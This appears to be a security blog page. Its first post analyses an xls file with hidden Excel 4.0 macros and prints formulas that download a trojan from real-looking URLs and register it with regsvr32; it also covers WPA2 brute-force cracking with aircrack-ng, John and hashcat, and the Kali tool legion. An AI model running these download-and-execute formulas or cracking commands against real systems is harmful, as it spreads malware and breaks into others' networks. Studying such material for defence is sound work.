<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAB_r7tGkkhOB_wDIswYwDyhT9DRjjoT01gerXAI7hmPXAd3ZjO-kGYD6dB9pnCwDX_SLVJg5bi_k_QGP0FTpvxiigqCHdsQNFyX8BqM_njWb1okrRwsvIC8K5LSQSu7o3o0FQzOkDiIF8ynFHMGZcFknlfu2CgKA6fFmnshqKnIzxuhe3ikWoyT1HEQ/s824/pic02.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="408" data-original-width="824" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAB_r7tGkkhOB_wDIswYwDyhT9DRjjoT01gerXAI7hmPXAd3ZjO-kGYD6dB9pnCwDX_SLVJg5bi_k_QGP0FTpvxiigqCHdsQNFyX8BqM_njWb1okrRwsvIC8K5LSQSu7o3o0FQzOkDiIF8ynFHMGZcFknlfu2CgKA6fFmnshqKnIzxuhe3ikWoyT1HEQ/w400-h198/pic02.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 2: OfficeMalScanner finds no macros</td></tr></tbody></table><br />
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;"><span style="font-size: 14pt; text-indent: 2em;">Looking at this <span style="font-family: arial;">xls</span> more closely, I found it has only one worksheet, containing nothing but a picture. At first I assumed the picture was there to trick people into clicking it, but its properties showed no link to any macro. By chance I noticed something odd about the "<span style="color: #2b00fe;">Name Box</span>" at the left of the toolbar (Figure 3): whichever name I selected, Excel did not jump to the cell that the name stands for. In other words, "<span style="color: #cc0000;">something is hidden</span>". Back in the <span style="font-family: arial;">VBScript</span> editor there really were <span style="color: #cc0000;">four</span> worksheets, while the spreadsheet view showed only <span style="color: #cc0000;">one</span> (Figure 4).</span></p>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxylR2NwerCvoupwpfrRnkCecy7v9PjhAIISyiLFKYtDUJYZ8d7poevIcQ-8q-vq9lar7KxnIQwVGNHHqJQ9QLBkxk-SyINmFy-q2WmJxYHzBPwdj2V_K2RWoj1VbHOF2ZJDhqlrGMBSqAhrxCXPQLRKqqZmSx6I8U7F14QrPZn-phy5e8NFKG8CzZhA/s819/pic03.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="472" data-original-width="819" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxylR2NwerCvoupwpfrRnkCecy7v9PjhAIISyiLFKYtDUJYZ8d7poevIcQ-8q-vq9lar7KxnIQwVGNHHqJQ9QLBkxk-SyINmFy-q2WmJxYHzBPwdj2V_K2RWoj1VbHOF2ZJDhqlrGMBSqAhrxCXPQLRKqqZmSx6I8U7F14QrPZn-phy5e8NFKG8CzZhA/w400-h230/pic03.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 3: Names that do not lead to any cell</td></tr></tbody></table><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RfvUl9uvpAhEyw5FuIO9rcaoY24Jb_y5xoq4Iw-qEa4HIOeSoFr8zctZSJzo-rsiLEi285vnZjDPctdtuR7sWRuFgaUegCHs9zCdpza71uxDbVDt-otYuAGnVVt6Nl9CS-mjG1x84m7Exu6f2nBdvcqzjie0qCI8rNwBxUK6mVhtYk7t8n7KIBjKUg/s1186/pic04.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="656" data-original-width="1186" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RfvUl9uvpAhEyw5FuIO9rcaoY24Jb_y5xoq4Iw-qEa4HIOeSoFr8zctZSJzo-rsiLEi285vnZjDPctdtuR7sWRuFgaUegCHs9zCdpza71uxDbVDt-otYuAGnVVt6Nl9CS-mjG1x84m7Exu6f2nBdvcqzjie0qCI8rNwBxUK6mVhtYk7t8n7KIBjKUg/w400-h221/pic04.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 4: The hidden worksheets are visible in the VBScript editor</td></tr></tbody></table><br />
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;"><span style="font-size: 14pt; text-indent: 2em;">Back in the spreadsheet view, I right-clicked the sheet tabs at the bottom and unhid the hidden worksheets one by one, and there really were five worksheets! Yet the <span style="font-family: arial;">VBScript</span> editor showed only four, so one was missing, and that one had to be the key. Searching online, I found that someone had indeed described </span><a href="http://forum.twbts.com/viewthread.php?tid=77&extra=" rel="nofollow" style="font-size: 14pt; text-indent: 2em;" target="_blank">a method for removing a <span style="font-family: arial;">sheet</span> from the <span style="font-family: arial;">VBScript</span> editor</a><span style="font-size: 14pt; text-indent: 2em;"> (but not how to restore it).</span></p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">The three restored worksheets <span style="font-family: arial;">Vv1</span>, <span style="font-family: arial;">Vv2</span> and <span style="font-family: arial;">Vv3</span> hold only reference text. The one that matters is the <span style="color: #cc0000; font-family: arial;">FRHJDJDI</span> worksheet, which is also the sheet that was removed from the <span style="font-family: arial;">VBScript</span> editor.</p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;"><span style="font-family: arial;">FRHJDJDI</span> has a formula only in cell <span style="color: #cc0000; font-family: arial;">F10</span>. It assembles formula text from the contents of the <span style="font-family: arial;">Vv1</span>, <span style="font-family: arial;">Vv2</span> and <span style="font-family: arial;">Vv3</span> sheets and then executes it with <span style="font-family: arial;">FORMULA()</span>. However, <span style="font-family: arial;">FORMULA()</span> is not a built-in <span style="font-family: arial;">Excel</span> formula, which means it is a macro (<span style="font-family: arial;">VBScript</span>) made by the attacker. After analysis, cell <span style="font-family: arial;">F10</span> of <span style="font-family: arial;">FRHJDJDI</span> performs the following actions:</p>
<div style="color: #1aac46; font-size: 9pt; line-height: 100%; margin: 0px;">
<pre style="margin-left: 2em; text-indent: -2em;">=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.itesmeitic.com/term/IFjx5ElE0ldr8wDDHjub/","..\wurod.ocx",0,0)</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.ingonherbal.com/application/PhEbceg4Tx/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ftp.colibriconstruction.net/cc/KHieqeOsagkmlGIuXc56/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://commune-ariana.tn/sites/3BvaCmo/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dmaicinnovations.com/Swift-5.0.2/jEtePB/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://drcreative.cz/images/DwThyQntyImCHk0tpba/","..\wurod.ocx",0,0))</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=IF(HRHRE6<0, CLOSE(0),)</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=EXEC("C:\Windows\System32\regsvr32.exe ..\wurod.ocx")</pre>
<pre style="margin-left: 2em; text-indent: -2em;">=RETURN()</pre>
</div>
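<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;line-height: 150%;">So this <span style="font-family: arial;">xls</span> carries out its malicious behaviour through the mechanism by which <span style="font-family: arial;">Excel</span> <span style="color: #990000;">automatically calculates formulas</span> when a workbook is opened. According to the recovered formulas, it tries to download a trojan from six sources and, as soon as one download succeeds, registers it as an <span style="font-family: arial;">ActiveX</span> component. What the malware itself does still awaits reverse engineering. <span style="color: #38761d;">Another open question: is there a way to restore the removed worksheet?</span></p>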
<hr />
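<p><span style="color: #cc0000;"><span style="font-size: medium;"><b>Postscript:</b></span></span></p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;line-height: 150%;">Thanks to my teacher 林易澍 for the guidance: this file turns out to use Excel 4.0 macro commands (known as XLM). Excel 4.0 macro commands have been deprecated since Excel 95 in favour of VBA, but current versions of Excel can still execute XLM. No wonder I could not find any VBA code in this document; my skills fell short and I was looking in the wrong direction!</p>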
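<p>An added triage example (not part of the original post or of any tool it names): once Excel 4.0 macro formulas such as those recovered from F10 are available as text, the script below pulls out every CALL to urlmon's URLDownloadToFile, the drop path and any EXEC command line, and flags the download-and-execute pairing. The sample formulas, host names and file name are constructed placeholders, and the function names are hypothetical.</p>

```python
import re

# Constructed sample shaped like the formulas recovered from cell F10 above.
# Hosts and the file name are placeholders, not indicators from the page.
SAMPLE_FORMULAS = r'''
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://one.example.invalid/a/","..\sample.ocx",0,0)
=IF(HRHRE1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://two.example.invalid/b/","..\sample.ocx",0,0))
=IF(HRHRE2<0, CLOSE(0),)
=EXEC("C:\Windows\System32\regsvr32.exe ..\sample.ocx")
=RETURN()
'''


def scan_parens(formula):
    """Map each '(' to its matching ')' and mark characters inside "..." literals."""
    pairs, stack, quoted, in_str, i = {}, [], [False] * len(formula), False, 0
    while i < len(formula):
        ch = formula[i]
        if in_str:
            quoted[i] = True
            if ch == '"':
                if formula[i + 1:i + 2] == '"':   # "" is an escaped quote
                    quoted[i + 1] = True
                    i += 1
                else:
                    in_str = False
        elif ch == '"':
            in_str, quoted[i] = True, True
        elif ch == "(":
            stack.append(i)
        elif ch == ")" and stack:
            pairs[stack.pop()] = i
        i += 1
    return pairs, quoted


def iter_calls(formula):
    """Yield (FUNCTION, [raw arguments]) for every call, including nested ones."""
    pairs, quoted = scan_parens(formula)
    for open_idx in sorted(pairs):
        name = re.search(r"[A-Za-z_][A-Za-z0-9_.]*$", formula[:open_idx])
        if not name:
            continue
        close_idx, args, depth, start = pairs[open_idx], [], 0, open_idx + 1
        for j in range(open_idx + 1, close_idx):
            if quoted[j]:
                continue                      # commas and parens in strings are data
            if formula[j] == "(":
                depth += 1
            elif formula[j] == ")":
                depth -= 1
            elif formula[j] == "," and depth == 0:
                args.append(formula[start:j].strip())
                start = j + 1
        args.append(formula[start:close_idx].strip())
        yield name.group(0).upper(), args


def unquote(arg):
    """Return the value of a string literal, or None if arg is not a literal."""
    if len(arg) >= 2 and arg[0] == '"' and arg[-1] == '"':
        return arg[1:-1].replace('""', '"')
    return None


def defang(url):
    """Make a URL non-clickable for reports and tickets."""
    return re.sub(r"(?i)^http", "hxxp", url).replace(".", "[.]")


def triage(text):
    """Summarise download and execution behaviour found in XLM formula text."""
    downloads, commands, functions = [], [], set()
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("="):
            continue
        for name, args in iter_calls(line):
            functions.add(name)
            strings = [unquote(a) for a in args]
            if name == "CALL" and len(strings) >= 2 and strings[1]:
                target = f"{strings[0]}!{strings[1]}".lower()
                if target.startswith("urlmon!urldownloadtofile"):
                    literal = [s for s in strings[3:] if s is not None]
                    url = next((s for s in literal if re.match(r"(?i)https?://", s)), None)
                    rest = [s for s in literal if s != url]
                    downloads.append({"url": defang(url) if url else None,
                                      "saved_as": rest[0] if rest else None})
            elif name == "EXEC" and strings and strings[0]:
                commands.append(strings[0])
    dropped = {d["saved_as"].lower() for d in downloads if d["saved_as"]}
    runs_dropped = [c for c in commands if any(p in c.lower() for p in dropped)]
    return {"functions": sorted(functions), "downloads": downloads,
            "exec": commands, "download_and_execute": bool(runs_dropped)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FORMULAS).items():
        print(key, "=", value)
```

<p>The defanged URLs and the drop path it reports can go straight into proxy and EDR searches; a true <code>download_and_execute</code> flag means an EXEC command line references a file that one of the downloads wrote.</p>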
</div>
<p style="font-size: 16pt;"><b>What is wrong with hashcat? It does not recognize the file converted by cap2hccapx</b></p>
<p>Published 2021-09-12T06:46:00.007+08:00, updated 2021-09-12T06:55:09.205+08:00</p>
<div style="border: 3px solid rgb(8, 108, 197); font-size: 14pt; line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
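Anyone who does brute-force cracking will be familiar with John the Ripper (JtR for short) and Hashcat. Over the past few days I took some spare time to compare how JtR, Hashcat and Aircrack-ng are operated when cracking WPA2. On performance, most people would instinctively pick Hashcat, so this post compares the different procedures rather than performance.</p><p style="margin-bottom: 8px; text-indent: 2em;">All three methods start with the same preparation: capturing packets, that is, using airodump-ng to capture the target AP's packets. Once enough suitable packets have been collected, the next steps differ slightly. This example uses "<b><span style="color: #0b5394;">brute force</span></b>" and assumes the password is 8 digits (the longer and more complex the password, the longer cracking takes).</p>
<p style="font-weight: bold;">Cracking with aircrack-ng</p>
<p style="margin-bottom: 8px; text-indent: 2em;">aircrack-ng can process the captured *.cap file directly, but it cannot generate brute-force candidates itself, so it relies on john's mask mode. The command is as follows (aircrack-ng's <span style="background-color: #fcff01;">-w -</span> parameter means the wordlist is read from STDIN):</p>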
<div style="border: 2px solid green; margin: 0px; padding: 0px;">
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">john </span>--mask=?d?d?d?d?d?d?d?d --stdout | <span style="color: #990000;">aircrack</span>-ng -a 2 -b 1C:AB:C0:DD:xx:xx abc-01.cap <b><span style="background-color: #fcff01; color: #cc0000;">-w -</span></b></div>
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYUExeZnYxFeEDWi2VVqbo9_3f4omJw-IBUYqN2-k8czrL4TVysFaXe-ojQXRH0zvDpJn-2xMIzuwZBUgklAHDadJ7ip0SjJheig5N1c467MH6-aC0PxkhbVBaqBSohM5PnkV8atLltuYG/s829/aircrack-ng-AP.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="665" data-original-width="829" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYUExeZnYxFeEDWi2VVqbo9_3f4omJw-IBUYqN2-k8czrL4TVysFaXe-ojQXRH0zvDpJn-2xMIzuwZBUgklAHDadJ7ip0SjJheig5N1c467MH6-aC0PxkhbVBaqBSohM5PnkV8atLltuYG/s400/aircrack-ng-AP.PNG" width="400" /></a></div>
<p style="font-weight: bold;">Cracking with John the Ripper</p>
<p>To crack WPA2 with JtR, first use wpapcap2john to convert the *.cap into a format that JtR recognizes:</p>
<div style="border: 2px solid green; margin: 0px; padding: 0px;">
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">wpapcap2john</span> abc-0*.cap > ap.john</div>
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">john </span>--mask=?d?d?d?d?d?d?d?d --format=wpapsk ap.john</div>
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVYHrOgSSZEZV_Am7uuKVm_AyRgM7Nf9bchV9zfgYh_Te9pFD-8XcItTf01BrtQGWBPrCLjc1xa0kavToEQjQxBdiQVFMKW5eHdML7hDnNU_8TF1zcZ054xaOC7CFXuBoLqPlI70BjkngL/s828/john_the_ripper-AP.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="541" data-original-width="828" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVYHrOgSSZEZV_Am7uuKVm_AyRgM7Nf9bchV9zfgYh_Te9pFD-8XcItTf01BrtQGWBPrCLjc1xa0kavToEQjQxBdiQVFMKW5eHdML7hDnNU_8TF1zcZ054xaOC7CFXuBoLqPlI70BjkngL/s400/john_the_ripper-AP.PNG" width="400" /></a></div>
<p style="font-weight: bold;">Cracking with Hashcat</p>
<p>To crack WPA2 with Hashcat, first use cap2hccapx or aircrack-ng to convert the *.cap into hccapx format:</p>
<div style="border: 2px solid green; margin: 0px; padding: 0px;">
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">aircrack-ng </span>-j ap.hccapx abc-01.cap</div>
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">cap2hccapx</span> abc-01.cap ap.hccapx</div>
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">hashcat </span>-a 3 -m 22000 ap.hccapx ?d?d?d?d?d?d?d?d</div>
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjYDTfl0FUvkfUELWz37TDkFPeIgf_prgBLlVe1emb8rHJ5wbqBY_VgN7TX4j-xQ_yDcRwofKxZwmpCiZzKof9rVAv3b_1z-Cfm_46jksWkFsM4xqRWlaFuM8lBLCh3HgpYkbgubqmzaH/s907/hashcat-AP.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="828" data-original-width="907" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjYDTfl0FUvkfUELWz37TDkFPeIgf_prgBLlVe1emb8rHJ5wbqBY_VgN7TX4j-xQ_yDcRwofKxZwmpCiZzKof9rVAv3b_1z-Cfm_46jksWkFsM4xqRWlaFuM8lBLCh3HgpYkbgubqmzaH/s400/hashcat-AP.PNG" width="400" /></a></div>
<hr />
<p style="font-weight: bold;">Different versions of hccapx</p>
<div style="margin-bottom: 8px;">hashcat 6.1.1 on Kali cracks the file produced by cap2hccapx normally, but 6.2.4 on Windows 10 reports the following error:<br />
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUVVkQrkDtebL7j0_q5Rc28B7pYv7JooXeUCqWXK7nIhdo8kTVeE757SpJDWMzbG-62jOpJFiMPQxwzVYccMvxzCUroTIotQp9c-hpc7oO1yZLmIkwtu4r6tEHbdk0P-Xxau4bnL7CyOuF/s804/hashcat-separator_unmatched.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="695" data-original-width="804" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUVVkQrkDtebL7j0_q5Rc28B7pYv7JooXeUCqWXK7nIhdo8kTVeE757SpJDWMzbG-62jOpJFiMPQxwzVYccMvxzCUroTIotQp9c-hpc7oO1yZLmIkwtu4r6tEHbdk0P-Xxau4bnL7CyOuF/s400/hashcat-separator_unmatched.PNG" width="400" /></a></div>
</div>
<p>The result of the online conversion at <a href="https://hashcat.net/cap2hashcat/">https://hashcat.net/cap2hashcat/</a>, however, is processed normally by hashcat 6.2.4.</p>
<div>1. Upload the .cap file to <a href="https://hashcat.net/cap2hashcat/">https://hashcat.net/cap2hashcat/</a><br />
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxpA9ymprexFIImLw1updc8Y1h9yssB-cKr-rxhWuqceuYC0mr5zZetMIx50KyPAsNCyimenqxkXMd0XkJ61zs5wqtJDUqkmC0aahcc25Bqv_XSj4kNFgQmdd8va3stUKpcgQ9l-EhU1f/s1330/Conver-online.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="587" data-original-width="1330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxpA9ymprexFIImLw1updc8Y1h9yssB-cKr-rxhWuqceuYC0mr5zZetMIx50KyPAsNCyimenqxkXMd0XkJ61zs5wqtJDUqkmC0aahcc25Bqv_XSj4kNFgQmdd8va3stUKpcgQ9l-EhU1f/s400/Conver-online.PNG" width="400" /></a></div>
</div>
<div>2. Download the converted result<br />
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDdPLsaeGdoGsQX0O7x_rGzSQzppC10JSb8aj-BKRh6bwiaFYyjoWQh551Dz6FUnd2MYZOtNeHU8Hqspo_SQ1p2uXmNezHXWzPB0S6K8RKjhZBOcXgyukE-KhR0GqNk8rO4gWUl6ys5VuH/s1023/Conver-online-download.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="891" data-original-width="1023" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDdPLsaeGdoGsQX0O7x_rGzSQzppC10JSb8aj-BKRh6bwiaFYyjoWQh551Dz6FUnd2MYZOtNeHU8Hqspo_SQ1p2uXmNezHXWzPB0S6K8RKjhZBOcXgyukE-KhR0GqNk8rO4gWUl6ys5VuH/s400/Conver-online-download.PNG" width="400" /></a></div>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">A comparison shows that <span style="font-size: 14pt; text-indent: 37.3333px;">the output of cap2hccapx or aircrack-ng is a binary file, whereas </span><span style="font-size: 14pt; text-indent: 2em;">the online conversion produces a text file. So, to crack WPA2 with hashcat on Windows, you can upload the *.cap file to </span><a href="https://hashcat.net/cap2hashcat/" style="font-size: 14pt; text-indent: 2em;">https://hashcat.net/cap2hashcat/</a><span style="font-size: 14pt; text-indent: 2em;"> for conversion.</span></div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWSS9T3ko9zatTPnluKQXCnXjU8Ue7cA3OcErKRoGD-ffQ400D93ERCpTQEJGx8bHzQNtrCuHHemtYVJ9qYyNG1SIvWK4u3_X_cae1UwVOUEoHbaqQ4DCH5QyGZ0CJ7hxa5rt98edXy34/s914/cmp-hccapx.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="500" data-original-width="914" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWSS9T3ko9zatTPnluKQXCnXjU8Ue7cA3OcErKRoGD-ffQ400D93ERCpTQEJGx8bHzQNtrCuHHemtYVJ9qYyNG1SIvWK4u3_X_cae1UwVOUEoHbaqQ4DCH5QyGZ0CJ7hxa5rt98edXy34/s400/cmp-hccapx.PNG" width="400" /></a></div>
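<p>An added example (not from the original post or from the hashcat project): a checker that tells the two converter outputs compared above apart before a file is handed to hashcat. It assumes the published hccapx version 4 layout (a 393-byte packed record starting with "HCPX") and the <code>WPA*01*</code>/<code>WPA*02*</code> text hash line used by mode 22000; the sample records and all function names are constructed for illustration.</p>

```python
import struct

# hccapx record (packed, little-endian): signature, version, message_pair,
# essid_len, essid[32], keyver, keymic[16], mac_ap[6], nonce_ap[32],
# mac_sta[6], nonce_sta[32], eapol_len, eapol[256]  ->  393 bytes
HCCAPX = struct.Struct("<4sIBB32sB16s6s32s6s32sH256s")


def mac(raw):
    """Format raw MAC bytes as aa:bb:cc:dd:ee:ff."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_hccapx(data):
    """Parse every complete hccapx record in a binary blob."""
    count, trailing = divmod(len(data), HCCAPX.size)
    records = []
    for n in range(count):
        (sig, version, msg_pair, essid_len, essid, keyver, _mic, mac_ap,
         _anonce, mac_sta, _snonce, eapol_len, _eapol) = HCCAPX.unpack_from(
            data, n * HCCAPX.size)
        if sig != b"HCPX" or essid_len > 32 or eapol_len > 256:
            raise ValueError(f"record {n}: not a valid hccapx structure")
        records.append({"essid": essid[:essid_len].decode("utf-8", "replace"),
                        "mac_ap": mac(mac_ap), "mac_sta": mac(mac_sta),
                        "version": version, "keyver": keyver,
                        "message_pair": msg_pair})
    return {"format": "hccapx", "container": "binary",
            "records": records, "trailing_bytes": trailing}


def parse_hash_lines(text):
    """Parse text hash lines: WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_STA*ESSID*..."""
    records = []
    for line in text.splitlines():
        f = line.strip().split("*")
        if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
            continue
        try:
            records.append({"essid": bytes.fromhex(f[5]).decode("utf-8", "replace"),
                            "mac_ap": mac(bytes.fromhex(f[3])),
                            "mac_sta": mac(bytes.fromhex(f[4])),
                            "type": "PMKID" if f[1] == "01" else "EAPOL"})
        except ValueError:
            continue                      # non-hex field: not a usable hash line
    return {"format": "22000", "container": "text", "records": records}


def identify(data):
    """Classify a converter output as hccapx (binary), 22000 (text) or unknown."""
    if data[:4] == b"HCPX":
        return parse_hccapx(data)
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return {"format": "unknown", "container": "binary", "records": []}
    parsed = parse_hash_lines(text)
    if parsed["records"]:
        return parsed
    return {"format": "unknown", "container": "text", "records": []}


def build_samples():
    """Constructed data: the same made-up handshake metadata in both containers."""
    essid = b"lab-ap"
    ap, sta = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    binary = HCCAPX.pack(b"HCPX", 4, 0, len(essid), essid, 2, bytes(16), ap,
                         bytes(32), sta, bytes(32), 121, bytes(256))
    text = "*".join(["WPA", "02", "00" * 16, ap.hex(), sta.hex(), essid.hex(),
                     "00" * 32, "00" * 121, "00"]) + "\n"
    return binary, text.encode("ascii")


if __name__ == "__main__":
    for blob in build_samples():
        result = identify(blob)
        print(result["format"], result["container"], result["records"])
```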
</div>
<p style="font-size: 16pt;"><b>Kali's sparta integration tool is gone; use legion instead</b></p>
<p>Published 2021-09-08T14:02:00.000+08:00, updated 2021-09-08T20:49:16.960+08:00</p>
<div style="border: 3px solid rgb(8, 108, 197); font-size: 14pt; line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
sparta is a graphical, integrated scanning and enumeration platform. It has no scanning capability of its own, but it brings together tools such as nmap, Nikto, hydra and nbtscan. Given a list of target addresses, sparta scans them with nmap and then calls the other tools for follow-up processing according to the scan results, which saves penetration testers a great deal of time. </p><p style="margin-bottom: 8px; text-indent: 2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd7gyi0QrZp3LAri7L0trPNdvl7aLmb1hzoTx9PaxYfi21WDD5FMxiaOokYmglBnxDGEKSL4FlqCxi6ZjhcLqF1PBF76dAWk0b42gwz9jqI0FARpyri_uZpxj13dS7Q6VtT8zs_s_laCnj/s1029/Fig_07-12.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="sparta" border="0" data-original-height="790" data-original-width="1029" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd7gyi0QrZp3LAri7L0trPNdvl7aLmb1hzoTx9PaxYfi21WDD5FMxiaOokYmglBnxDGEKSL4FlqCxi6ZjhcLqF1PBF76dAWk0b42gwz9jqI0FARpyri_uZpxj13dS7Q6VtT8zs_s_laCnj/w400-h308/Fig_07-12.PNG" title="sparta running" width="400" /></a></div>
<p style="margin-bottom: 8px; text-indent: 2em;">
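Because sparta's developers no longer maintain it and it runs on Python 2.6, itself an outdated version, Kali removed sparta after release 2019.4. Those used to doing penetration tests with sparta may want to <span style="color: #cc0000;"><b>switch to legion</b></span>; <span style="color: #38761d;">legion's interface is almost identical to sparta's</span>. Kali does not ship with legion preinstalled, however, so you have to install it yourself: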
</p>
<div style="border: 2px solid rgb(246, 13, 221); font-size: 14pt; line-height: 100%; padding: 8px;">
<b>apt-get install legion
</b></div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUU0XeY7t9zTuM5CnoAvUeToUXg10R546eOrHheWvAs03UzNixHnv5sEg0aBNvRk30MCcf5GNEmc7EtXxaztfnYCVfOw0JDlDg_tZNd9hCQ258t5NQszs_cwLOswx2iScExuIASrL95HD_/s1191/Fig_07-13.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="legion running" border="0" data-original-height="887" data-original-width="1191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUU0XeY7t9zTuM5CnoAvUeToUXg10R546eOrHheWvAs03UzNixHnv5sEg0aBNvRk30MCcf5GNEmc7EtXxaztfnYCVfOw0JDlDg_tZNd9hCQ258t5NQszs_cwLOswx2iScExuIASrL95HD_/s400/Fig_07-13.PNG" title="legion running" width="400" /></a></div>
<p style="margin-bottom: 8px; text-indent: 2em;">After installation, you can follow the approach in "<a href="http://atic-tw.blogspot.com/2021/09/kaliapplications-menu.html">Customizing the items (members) of the Kali Applications Menu</a>" to add legion to the Kali Applications Menu. Below is my legion.desktop. Once it is added, legion can be found in two places, "<span style="color: #2b00fe;">01-Information Gathering</span>─><span style="color: #38761d;">OSINT Analysis</span>" and "<span style="color: #2b00fe;">05-Password Attacks</span>─><span style="color: #38761d;">Online Attacks</span>":
</p>
<div style="border: 2px solid rgb(246, 13, 221); font-size: 14pt; line-height: 140%; padding: 4px;">
[Desktop Entry]<br />
Name=legion(Sparta)<br />
Encoding=UTF-8<br />
Exec=legion<br />
Icon=kali-menu<br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=01-07-osint-analysis;05-01-online-attacks;<br />
X-Kali-Package=legion<br />
</div>
